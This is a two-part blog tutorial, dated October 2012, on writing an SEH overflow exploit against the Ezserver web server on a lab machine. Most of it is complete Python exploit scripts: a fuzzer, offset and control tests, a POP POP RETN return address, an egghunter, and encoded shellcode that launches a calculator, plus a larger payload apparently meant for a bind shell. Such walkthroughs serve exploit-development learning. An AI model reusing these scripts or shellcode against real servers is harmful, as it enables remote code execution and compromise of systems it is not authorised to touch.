Wednesday, October 03, 2012

SEH Exploit Ezserver part 2 ( egghunter )

previously (on part 1), we heve discusssed until generate payload for calculator.
why i use calculator ??? because the payload for calculator just need small size to prove that we have no problem about the fuzzer.
but why don't use payload for bind shell ?? because we have no more space to landing the payload.

so i try to use egghunter. (for more information about egghunter, please visit here).

this is the scenario :

buffer=(w00tw00t+payload+nop1)+JMP SHORT+address of .dll (Stepping stone)+ nop2+egghunter

#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=8000

buffer="\x90"*5427

egghunter=("\x66\x81\xCA\xFF\x0F\x42\x52\x6A"
"\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
"\xEF\xB8\x77\x30\x30\x74\x8B\xFA"
"\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")

payload=("\xbf\x31\x61\x90\xb0\xdb\xc9\x2b\xc9\xd9\x74\x24\xf4\xb1\x51\x5b"
"\x31\x7b\x12\x03\x7b\x12\x83\xda\x9d\x72\x45\xe0\x34\x98\xeb\xf0"
"\x30\xa1\x0b\xff\xa3\xd5\x98\xdb\x07\x61\x25\x1f\xc3\x09\xa3\x27"
"\xd2\x1e\x20\x98\xcc\x6b\x68\x06\xec\x80\xde\xcd\xda\xdd\xe0\x3f"
"\x13\x22\x7b\x13\xd0\x62\x08\x6c\x18\xa8\xfc\x73\x58\xc6\x0b\x48"
"\x08\x3d\xdc\xdb\x55\xb6\x43\x07\x97\x22\x1d\xcc\x9b\xff\x69\x8d"
"\xbf\xfe\x86\x32\xec\x8b\xd0\x58\xc8\x97\x83\x63\x21\x73\x27\xe8"
"\x01\xb3\x23\xae\x89\x38\x43\x32\x3f\xb5\xe4\x42\x61\xa2\x6a\x1c"
"\x93\xde\x23\x5f\x7d\x78\x97\xf9\xea\xb6\x25\x6d\x9c\xcb\x7b\x32"
"\x36\xd3\xac\xa4\x7d\xc6\xb1\x0f\xd2\xe6\x9c\x30\x5b\xfd\x47\x4f"
"\xb6\xf6\x85\x1a\x23\x05\x75\x74\xdb\xd0\x80\x81\xb1\xb4\x6d\xbf"
"\x99\x69\xc1\x6c\x4d\xcd\xb6\xd1\x22\x2e\xe8\xb3\xac\xc1\x55\x5d"
"\x7e\x6b\x84\x34\xe8\xcf\x5d\x46\x2e\x58\x9d\x70\xda\x77\x30\x29"
"\xe4\xa8\xda\x75\xb7\x67\xf2\x22\x37\xa1\x57\x99\x38\x9e\x30\xc4"
"\x8e\x99\x88\x51\xee\x70\x5a\x09\x44\x28\xa4\x61\xf7\xba\xbd\xf8"
"\x3e\x43\x15\x05\x68\xe1\x66\x29\xf3\x60\xfd\xaf\x94\x17\x90\xa6"
"\x80\xb2\x3a\xe1\x63\x8f\x32\xf6\x1e\x4b\xcc\x1a\xef\x93\x3d\x70"
"\xee\x56\xef\x7a\x4d\x7b\x7c\x0f\x28\xbb\x29\xa4\x66\xd3\x5f\x44"
"\xcb\x32\x5f\xcd\x68\xc4\x49\x76\x26\x68\x27\xd9\x99\xe6\xc6\x88"
"\x48\xa2\x99\xd5\xbb\x24\xb7\xf0\x39\x7b\x94\xfd\x94\xe9\xe4\xfe"
"\x2e\x11\xca\x8b\x06\x11\x68\x4f\xcc\x16\xb9\x1d\xf2\x39\x2e\xdf"
"\xd4\x58\xdc\x4c\x1a\x4a\xdc\xa2")

buffer+="w00tw00t"
buffer+=payload
buffer+="\x90"*100

buffer+="\xeb\x06\x90\x90" #JMP SHORT
buffer+="\x96\x96\x20\x10" # address of file MSVCRTD.DLL

buffer+="\x90"*16
buffer+=egghunter
buffer+="\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))

sock.send("GET /"+buffer+"HTTP/1.1")
print("kirim")
sock.close()




alhamdulillah ... :D
Posted by at No comments:

Tuesday, October 02, 2012

SEH Exploit Ezserver part 1


now i will try to exploit Ezserver

- first, make fuzzer, run the application and then attach process Ezserver into ollydbg

#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=8000
buffer="\x41" * 7000
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send("GET /"+buffer+"HTTP/1.1")
print("kirim")
sock.close()

the fuzzer try to send 8000 byte character A into Ezserver. we can see the application crash but the EIP not overwrite. and see the SEH chain


then press shift + f9 . so the EIP will be overwrite



- search the stepping stone
menu view --> executables modules.


search module to use as stepping stone that not compiled using safeSEH and Dllcharacteristics.
use msfpescan
first i try to use module js32.dll



then find out the command POP POP RETN, here, i not found the command POP POP RETN, so i try to use module MSVCRTD.DLL



next step, search the POP, POP, RETN
right click --> search for --> sequence of command


then type POP r32, POP r32, RETN. so we found memory address of MSVCRTD.DLL


- search the offset to overwrite the address of SEH
create the pattern for 7000 bytes and then copy into fuzzer.


#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=8000
buffer="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa ..............7Iy8Iy9Iz0Iz1Iz2I"
buffer+="\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send("GET /"+buffer+"HTTP/1.1")
print("kirim")
sock.close()

see the SEH chain and then press shift + F9



use pattern offset



we can see that we need 5883 byte buffer to trigger the SEH handler

#!/usr/bin/python

import socket
target_address="192.168.56.101"
target_port=8000
buffer="\x90"*5879
buffer+="\xCC\xCC\xCC\xCC"
buffer+="\xAA\xAA\xAA\xAA"
buffer+="\x90" * (7004-len(buffer))
buffer+="\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send("GET /"+buffer+"HTTP/1.1")
print("kirim")
sock.close()


we can see that the value buffer A success enter into SEH handler


- next step, try to control the CPU process
use the address of MSVCRTD.DLL


#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=8000
buffer="\x90"*5879
buffer+="\xCC\xCC\xCC\xCC"
buffer+="\x96\x96\x20\x10" # address of file MSVCRTD.DLL
buffer+="\x90" * (7004-len(buffer))
buffer+="\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send("GET /"+buffer+"HTTP/1.1")
print("kirim")
sock.close()


we can see that address of MSVCRTD.DLL have been entered into SEH handler
press shift + f9 to forward process into memory MSVCRTD.DLL
then, press shift + f9 again to continue, and the process will leads into command POP POP RETN
thenpress f7 until reach the command RETN.


then, make the payload.
but we have a problem, because space of stack in this application aren't enough to landing the payloads.


#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=8000
buffer="\x90"*5879

buffer+="\xeb\x06\x90\x90" #JMP SHORT
buffer+="\x96\x96\x20\x10" # address of file MSVCRTD.DLL
buffer+="\x90" * 16

payload=("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f"
"\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e"
"\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d"
"\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c"
"\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b"
"\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a"
"\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69"
"\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78"
"\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87"
"\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96"
"\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5"
"\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4"
"\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3"
"\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2"
"\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1"
"\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")

buffer+="\x90"*16
buffer+=payload
buffer+="\x90" * (7004-len(buffer))
buffer+="\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send("GET /"+buffer+"HTTP/1.1")
print("kirim")
sock.close()


we can see in mmory stack, the there are not enough space for landing the payloads


so i try to make that the fuzzer is correct and the payload should be executed. here i try to use payload for execute calculator.


#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=8000

buffer="\x90"*5879
buffer+="\xeb\x06\x90\x90" #JMP SHORT
buffer+="\x96\x96\x20\x10" # address of file MSVCRTD.DLL

payload=("\xbe\x84\x65\x5d\x58\xda\xd9\x29\xc9\xb1\x51\xd9\x74\x24\xf4\x5b"
"\x31\x73\x12\x83\xc3\x04\x03\xf7\x6b\xbf\xad\x0b\x19\xd4\x03\x1b"
"\x27\xd5\x63\x24\xb8\xa1\xf0\xfe\x1d\x3d\x4d\xc2\xd6\x3d\x4b\x42"
"\xe8\x52\xd8\xfd\xf2\x27\x80\x21\x02\xd3\x76\xaa\x30\xa8\x88\x42"
"\x09\x6e\x13\x36\xee\xae\x50\x41\x2e\xe4\x94\x4c\x72\x12\x52\x75"
"\x26\xc1\xb3\xfc\x23\x82\x9b\xda\xaa\x7e\x45\xa9\xa1\xcb\x01\xf2"
"\xa5\xca\xfe\x0f\xfa\x47\x89\x63\x26\x44\xeb\xb8\x17\xaf\x8f\xb5"
"\x1b\x7f\xdb\x89\x97\xf4\xab\x15\x05\x81\x0c\x2d\x0b\xfe\x02\x63"
"\xbd\x12\x4a\x84\x17\x8c\x38\x1c\xf0\x62\x8d\x88\x77\xf6\xc3\x17"
"\x2c\x07\xf3\xcf\x07\x1a\x08\x34\xc8\x1a\x27\x15\x61\x01\xae\x28"
"\x9c\xc2\x2d\x7f\x35\xd1\xce\xaf\xa1\x0c\x39\xba\x9f\xf8\xc5\x92"
"\xb3\x55\x69\x49\x67\x19\xde\x2e\xd4\x62\x30\xd6\xb2\x8d\xed\x70"
"\x10\x27\xec\xe9\xfe\x93\xf5\x61\x38\x8c\xf6\x57\xac\x23\x58\x02"
"\xce\x94\x32\x08\x9d\x3b\x2a\x07\x21\x95\xff\xf2\x22\xca\x68\x19"
"\x95\x6d\x21\xb6\xd9\xa4\xe2\x6c\x72\x1c\xfc\x5c\xe9\xf6\xe5\x25"
"\xc8\x7e\xbd\x2a\x02\xd5\xbe\x04\xcd\xbc\x24\xc2\x7a\x22\xc8\x83"
"\x9e\xce\x42\xca\x49\xc3\xea\x0b\xe3\x9f\x65\x31\xc5\xdf\x85\x1f"
"\xd8\xa2\x44\xa1\x67\x0f\x04\xd0\x12\x77\x81\x41\x49\xef\xa7\x6b"
"\x3d\xe6\xb8\xe6\x06\xf8\x91\x53\xd0\x54\x4f\x32\x8f\x32\x6e\xe5"
"\x7e\x96\x21\xfa\x51\x70\x6f\xdd\x57\x4f\x3c\x22\x81\x25\x3c\x23"
"\x19\x45\x12\x50\x31\x45\x10\xa2\xda\x4a\xc1\x78\xdc\x65\x86\x8c"
"\xa8\x82\x08\x3f\x52\x5c\x49\x6f")
buffer+="\x90"*16
buffer+=payload
buffer+="\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))

sock.send("GET /"+buffer+"HTTP/1.1")
print("kirim")
sock.close()


and we got the result like below


so, until here i can conclude that our fuzzer is correct. but we can't to execute bind shell payload, because we need more space on the stack.

i will continue in part 2
Posted by at No comments:
Subscribe to: Posts (Atom)